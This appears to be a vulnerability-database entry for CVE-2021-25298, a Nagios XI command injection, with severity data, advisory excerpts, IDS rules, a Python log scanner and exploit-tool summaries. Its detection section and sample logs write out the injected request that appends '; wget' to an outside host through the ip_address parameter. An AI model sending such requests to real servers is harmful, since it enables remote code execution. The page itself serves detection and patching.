CVE-2021-25298
Published: 2021-02-15
Priority: P1 92 · high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Flags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-02-01
Exploited in the wild
EPSS: 75.20% (99.4th percentile)
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | 5.5.6 – 5.7.5 | — |
Detection & IOCs (extracted from sources)
URL: /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b
Path: /nagiosxi/config/monitoringwizard.php
Command: ip_address=127.0.0.1%3b%20wget%20<oast-url>%3b
Snort rule:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- Exploit requests target GET /nagiosxi/config/monitoringwizard.php with the parameters wizard=digitalocean (or cloud-vm, switch, windowswmi), nextstep=4, and a URL-encoded semicolon (%3b) separating the injected command in the ip_address parameter.
- The Emerging Threats Snort rule (sid:2034993) detects the attack by matching GET requests to nagiosxi/config/monitoringwizard.php? that contain ip_address= followed by a semicolon (|3b|, matched against the normalized URI) within 30 bytes; the same pattern can be applied to NIDS and proxy logs.
- Exploitation requires prior authentication: look for a POST to /nagiosxi/login.php followed shortly by the malicious GET to monitoringwizard.php from the same source IP.
- The Metasploit module targets Nagios XI versions 5.5.6 to 5.7.5 across three wizards (windowswmi, switch, cloud-vm); Nagios XI instances fingerprinted in this version range should be prioritised for patching and monitoring.
- Successful exploitation runs commands as the apache user; monitor for unexpected processes spawned by apache/httpd, especially outbound wget/curl calls.
- Shodan/FOFA exposure queries can identify internet-facing Nagios XI instances: search for title:"Nagios XI" or http.title:"nagios xi" to enumerate attack surface.
- The Nuclei template uses the 'digitalocean' wizard name in the exploit request, but the vulnerable file is cloud-vm.inc.php; the Metasploit module also covers the 'windowswmi' and 'switch' wizards for the related CVEs (CVE-2021-25296/25297). Detection rules should account for all three wizard names.
- The Emerging Threats Snort rule (sid:2034993) references CVE-2021-25296 and CVE-2021-25297 in its metadata, but the rule body also matches CVE-2021-25298 traffic; ensure your NIDS signature set includes rev:1 or later of this rule.
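To make the detection guidance above concrete, here is an added example (not from any of the sources listed on this page) that re-implements the match logic of ET sid:2034993 in Python and runs it over a few constructed Apache-style access-log lines, adding the login-then-wizard correlation from the bullet above. The rule matches against Suricata's normalized http.uri buffer, so the example percent-decodes the request URI before looking for the semicolon; the `within:30` constraint is reproduced as a 30-byte window after `ip_address=`. The log lines, IP addresses and the `example.invalid` host are constructed; the function names are this example's own.

```python
"""Offline re-implementation of ET sid:2034993 (Nagios XI monitoringwizard.php
command injection) for reviewing web-server access logs.

Added example; not code from the ET ruleset, Nagios, or any source on this page.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache "combined" log format: src ident user [ts] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample traffic (not real captures). Line 2 and line 4 carry the
# semicolon-separated ip_address pattern the rule looks for; line 5 has a
# semicolon more than 30 bytes after ip_address= and therefore falls outside
# the rule's window, which is a limit of the signature worth knowing about.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jan/2022:10:15:01 +0000] "POST /nagiosxi/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jan/2022:10:15:03 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20http%3a%2f%2fexample.invalid%2f%3b HTTP/1.1" 200 5120 "-" "python-requests/2.25"
198.51.100.4 - - [27/Jan/2022:10:16:20 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nextstep=2&wizard=switch&ip_address=10.0.0.5 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jan/2022:10:17:45 +0000] "GET /nagiosxi/config/monitoringwizard.php?wizard=windowswmi&nextstep=4&ip_address=10.0.0.6%3b%20true HTTP/1.1" 200 4870 "-" "curl/7.68"
198.51.100.4 - - [27/Jan/2022:10:18:10 +0000] "GET /nagiosxi/config/monitoringwizard.php?wizard=cloud-vm&nextstep=4&ip_address=192.0.2.10&description=this-is-a-long-value-with-semicolon%3b HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jan/2022:10:18:30 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def matches_rule(method: str, uri: str) -> bool:
    """Mirror of sid:2034993: GET, monitoringwizard.php?, ip_address=, then a
    ';' (0x3b) that ends within 30 bytes of the end of 'ip_address='."""
    if method != "GET":
        return False
    norm = unquote(uri)  # Suricata's http.uri is the normalized (decoded) URI
    if "nagiosxi/config/monitoringwizard.php?" not in norm:
        return False
    idx = norm.find("ip_address=")
    if idx < 0:
        return False
    after = norm[idx + len("ip_address="):]
    return ";" in after[:30]  # within:30 on a 1-byte content


def wizard_name(uri: str):
    """Extract the wizard= parameter so hits can be grouped per wizard."""
    m = re.search(r"[?&]wizard=([^&]+)", unquote(uri))
    return m.group(1) if m else None


def scan_log(text: str, login_window: timedelta = timedelta(minutes=10)) -> list:
    """Return one dict per rule hit, noting whether the same source IP
    authenticated via POST /nagiosxi/login.php within login_window beforehand."""
    last_login = {}  # src IP -> timestamp of most recent login POST
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; skip rather than guess
        ts = datetime.strptime(m["ts"], TS_FMT)
        if m["method"] == "POST" and m["uri"].startswith("/nagiosxi/login.php"):
            last_login[m["src"]] = ts
            continue
        if matches_rule(m["method"], m["uri"]):
            prev = last_login.get(m["src"])
            hits.append({
                "src": m["src"],
                "ts": m["ts"],
                "wizard": wizard_name(m["uri"]),
                "status": int(m["status"]),
                "login_before": prev is not None and timedelta(0) <= ts - prev <= login_window,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Running the block over the constructed sample yields two hits (the digitalocean request preceded by a login from the same source, and the windowswmi request with no login in the window); the switch request without a semicolon and the cloud-vm request whose semicolon sits past the 30-byte window are not reported, matching what the signature itself would and would not fire on.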
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| vulncheck | — | 8.8 | HIGH | — |
| cisa | — | 8.8 | HIGH | — |
CISA
Nagios XI OS Command Injection
cisa·2022-01-18·CVSS 8.8
CVE-2021-25298 [HIGH] CWE-78 Nagios XI OS Command Injection
Vulnerability: Nagios XI OS Command Injection
Affected: Nagios Nagios XI
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-25298
Remediation Due Date: 2022-02-01
GHSA
GHSA-6gq5-wx57-577c: Nagios XI version xi-5
ghsa_unreviewed·2022-05-24
CVE-2021-25298 [HIGH] CWE-78 GHSA-6gq5-wx57-577c: Nagios XI version xi-5
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
VulnCheck
Nagios XI OS Command Injection
vulncheck·2021·CVSS 8.8
CVE-2021-25298 [HIGH] CWE-78 Nagios XI OS Command Injection
Nagios XI OS Command Injection
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Affected: Nagios Nagios XI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-02-01
Suricata
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
suricata·2025-01-09·CVSS 6.1
CVE-2021-25299 [MEDIUM] ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/nagiosxi/admin/sshterm.php?"; startswith; fast_pattern; content:"url="; nocase; pcre:"/^.+(script|onerror|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ri"; reference:url,www.connectwise.com/resources/cve-spotlight-nagios-xi-cve-2021-25296-25297-25298-25299; reference:cve,2021-25299; classtype:web-application-attack; sid:2059094; rev:2; metadata:affected_product
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
suricata·2022-01-27·CVSS 8.8
CVE-2021-25296 [HIGH] ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Metasploit
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Execution
metasploit·CVSS 8.8
CVE-2021-25296 [HIGH] Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Execution
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Execution
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
Nuclei
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
nuclei·CVSS 8.8
CVE-2021-25298 [HIGH] Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2021-25298
info:
  name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
  author: k0pak4
  severity: high
  description: |
    Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. T
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
Authors: Yue Guan, Lei Xu, Vaibhav Singhal, Brock Mammen
Published: July 1, 2021
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of each attack.
## Network Attack Trends February-April 2021: Analysis of the Latest Published Vulnerabilities
From February-April 2021, a total of 4,969 new Common Vulnerabilities and Exposures (CVE) numbers were registered. To better und
References
- http://nagios.com
- http://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html
- https://assets.nagios.com/downloads/nagiosxi/versions.php
- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
- https://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-and
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-25298
Timeline
- 2021-02-15: Published
- 2022-01-18: Added to CISA KEV
- Exploited in the wild